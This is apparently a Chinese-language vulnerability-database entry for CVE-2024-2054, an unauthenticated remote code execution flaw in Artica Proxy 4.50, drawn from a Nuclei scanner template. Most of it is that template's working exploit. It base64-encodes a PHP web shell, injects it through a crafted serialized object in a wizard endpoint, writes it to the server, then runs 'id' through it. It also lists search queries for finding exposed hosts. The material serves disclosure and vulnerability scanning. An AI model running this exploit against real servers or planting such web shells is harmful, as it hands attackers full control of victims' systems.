Artica Proxy 远程代码执行漏洞

漏洞信息

漏洞名称: Artica Proxy 远程代码执行漏洞

漏洞编号:

  • CVE: CVE-2024-2054

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Artica Proxy是一款广泛使用的代理服务器软件,主要用于企业级网络环境中,提供网络流量管理、内容过滤等功能。由于其广泛的应用,该软件的漏洞可能对大量企业网络构成威胁。该漏洞存在于Artica Proxy的特定端点中,攻击者可以通过构造特殊的HTTP请求,利用该端点实现远程代码执行。漏洞的技术根源在于软件未能正确验证和处理用户输入,导致攻击者可以注入并执行任意命令。这种漏洞的严重性在于,它不需要任何形式的身份验证即可被利用,且可以被自动化工具大规模利用,从而可能导致服务器被完全控制、数据泄露或服务中断。由于CVSS评分为9.8,属于严重级别,建议所有使用受影响版本的用户立即采取修补措施。

产品厂商: articatech

产品名称: artica_proxy

影响版本: 4.50

搜索语法: http.html:”artica” OR body=”artica”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/2ac85447c84c5077f49708edb15e5c6501e5edec/http%2Fcves%2F2024%2FCVE-2024-2054.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

id: CVE-2024-2054

info:
  name: Artica Proxy - RCE
  author: pussycat0x
  severity: critical
  description: |
    This template targets a remote code execution vulnerability in Artica Proxy by exploiting a specific endpoint.
  reference:
    - https://github.com/0xMarcio/cve/blob/main/2024/CVE-2024-2054.md
    - https://github.com/Madan301/CVE-2024-2054/blob/main/CVE-2024-2054.py
    - https://github.com/tanjiti/sec_profile
    - https://github.com/Madan301/CVE-2024-2054
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2054
    cwe-id: CWE-502
    epss-score: 0.79565
    epss-percentile: 0.99025
    cpe: cpe:2.3:a:articatech:artica_proxy:4.50:*:*:*:*:*:*:*
  metadata:
    vendor: articatech
    product: artica_proxy
    shodan-query: http.html:"artica"
    fofa-query: body="artica"
  tags: cve,cve2024,rce,artica,proxy,intrusive

variables:
  websh: '<?php system($_GET["cmd"]);?>'
  payload: '{{base64(websh)}}'


http:
  - raw:
      - |
        GET /wizard/wiz.upload.php HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /wizard/wiz.wizard.progress.php?build-js=%7B'TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI':%20%7B'cache_file':%20'/usr/share/artica-postfix/wizard/meow.upload.php',%20'cache_serializer':%20'json',%20'cache_size':%20999999999,%20'cache_data':%20%7B'{{payload}}+':%20%7B'cache_date':%200,%20'ttl':%20999999999%7D%7D%7D%7D  HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.32.3

      - | 
        GET /wizard/wiz.upload.php?cmd=id HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "wiz.wizard.progress.php"

      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"